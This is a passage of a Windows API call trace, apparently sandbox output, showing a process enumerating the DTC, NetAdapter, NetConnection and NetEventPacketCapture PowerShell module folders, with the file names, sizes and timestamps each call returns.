ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedHostSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.502] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xef8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.502] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x635, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.503] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ae0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterTMMappingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.503] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x60f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.503] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe44, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcLogTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.503] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x154d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcNetworkSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.504] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.504] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsStatisticsTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.504] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa84, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSessionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.537] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.538] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1766, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.538] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6701, dwReserved0=0x0, dwReserved1=0x0, cFileName="TestDtc.psm1", cAlternateFileName="")) returned 1 [0226.539] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6701, dwReserved0=0x0, dwReserved1=0x0, cFileName="TestDtc.psm1", cAlternateFileName="")) returned 0 [0226.539] FindClose (in: hFindFile=0x1a5cf850 | out: hFindFile=0x1a5cf850) returned 1 [0226.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.540] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.540] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.541] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ffb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0226.541] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapter.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.541] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3925, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterAdvancedProperty.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0226.541] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e57, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterAdvancedProperty.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.542] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x260e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterBinding.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0226.542] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterBinding.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.543] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2fb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterChecksumOffload.cdxml", cAlternateFileName="")) returned 1 [0226.543] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterChecksumOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.543] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2418, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterEncapsulatedPacketTaskOffload.cdxml", cAlternateFileName="")) returned 1 [0226.543] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterEncapsulatedPacketTaskOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.545] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterHardwareInfo.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0226.545] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterHardwareInfo.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.545] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x245a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterIPsecOffload.cdxml", cAlternateFileName="")) returned 1 [0226.545] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x15fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterIPsecOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.546] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2432, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterLso.cdxml", cAlternateFileName="")) returned 1 [0226.546] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1748, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterLso.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.554] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.554] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d [0226.554] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", lpFilePart=0x0) returned 0x3e [0226.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.577] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0226.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.578] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d [0226.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.594] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter\\netadapter.psd1")) returned 0x20 [0226.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.595] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0226.595] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", lpFilePart=0x0) returned 0x41 [0226.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.596] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0226.596] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", lpFilePart=0x0) returned 0x41 [0226.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.598] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0226.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.598] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0226.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.598] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0226.598] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", lpFilePart=0x0) returned 0x41 [0226.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.601] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection\\netconnection.psd1")) returned 0x20 [0226.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.601] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48 [0226.601] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", lpFilePart=0x0) returned 0x49 [0226.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.605] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x105, 